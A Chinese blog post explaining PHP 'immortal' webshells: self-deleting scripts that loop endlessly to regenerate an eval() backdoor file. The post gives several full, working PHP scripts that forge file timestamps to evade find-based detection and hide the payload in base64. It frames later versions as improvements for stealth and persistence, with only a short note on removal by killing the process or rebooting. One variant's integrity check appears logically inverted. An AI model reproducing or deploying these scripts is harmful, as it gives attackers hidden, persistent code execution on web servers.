PHP不死马初探


什么是不死马

内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。

流程大概为:

不死马.php–>上传到服务器–>服务器执行–>在服务器上循环生成

用以上流程达到不死的效果

可用的php函数

1.ignore_user_abort(true); -->函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行。
2.set_time_limit() -->函数设置脚本最大执行时间。这里设置为0,即没有时间方面的限制。
3.unlink(__FILE__) -->删除文件本身,以起到隐蔽自身的作用。
4.system() -->执行的命令用于修改文件的创建或修改时间,可以绕过“find –name '*.php' –mmin -10”命令检测最近10分钟修改或新创建的PHP文件,但不一定有用,可选。

来个简单的例子

<?php 
ignore_user_abort(true); //函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行。
set_time_limit(0); //函数设置脚本最大执行时间。这里设置为0,即没有时间方面的限制。
unlink(__FILE__); //删除文件本身,以起到隐蔽自身的作用。
$file = '2.php'; 
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
    file_put_contents($file,$code); //将一个字符串写入文件
    system('touch -m -d "2021-09-07 09:10:12" .2.php'); 
    usleep(5000);
} 
?>

具体的思路就是,就是让客户机断开的时候,不死马也是可以运行

然后不断的生成新的后门文件

把自己删除,达到隐藏的目的

.为前缀的文件,还可以隐藏后门文件本身

我们来试一下

测试环境为 kali 虚拟机

image-20210907132103742

在实验环境下创建马来模拟真是环境

查看一下进程

image-20210907132225334

这是实验开始前的进程

然后给予shell.php文件的权限 然后运行一下

image-20210907132313930

可以看到 原生成文件已经自我删除

查看进程

image-20210907132351627

已经写入到内存

我们尝试删除生成的shell文件

image-20210907132446906

会迅速再生

而且打开文件会提示一直在修改

image-20210907132525337

此时解决办法:

1、查看进程然后kill掉进程最后删除木马

2、重启然后删除木马

image-20210907132636730

成功清楚木马文件

当然这只是最简单的木马文件

下面我们来改进一下

<?php 
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
    file_put_contents($file,$code);
    system('touch -m -d "2018-12-01 09:10:12" .2.php');
    usleep(5000);
} 
?>

如果我们将

$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';

注释掉就可以绕过这个shell

所以我们可以采用将shellbase64加密

同时进行md5校验

这样更加安全

<?php
 ignore_user_abort(true);
 set_time_limit(0);
 $file = 'c.php';
 $code = base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+');
 while(true) {
     if(md5(file_get_contents($file))===md5($code)) {
         file_put_contents($file, $code);
     }
     usleep(50);
 }
?>

emmm 貌似php不死马 目前我只能写这么多了

但是有个弊端

被攻击者更换目录,或者把目录移走

木马就会失效,所以我们可以遍历文件夹每个都写

随便激活一个即可

<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){	
	sleep(1);	
	if(file_exists('index.php')){		
		if(md5_file('{name}')==='912d7b3bbd5cf7405c9cc8f16156321b'){
			
		}else{
			file_put_contents('{name}',base64_decode('PD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtoM10pKTs/Pg=='));
		}			
	}else{
		if(file_exists('{name}')){
			unlink('{name}');
		}
	}
}
?>

文章作者: H3h3QAQ
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 H3h3QAQ !
  目录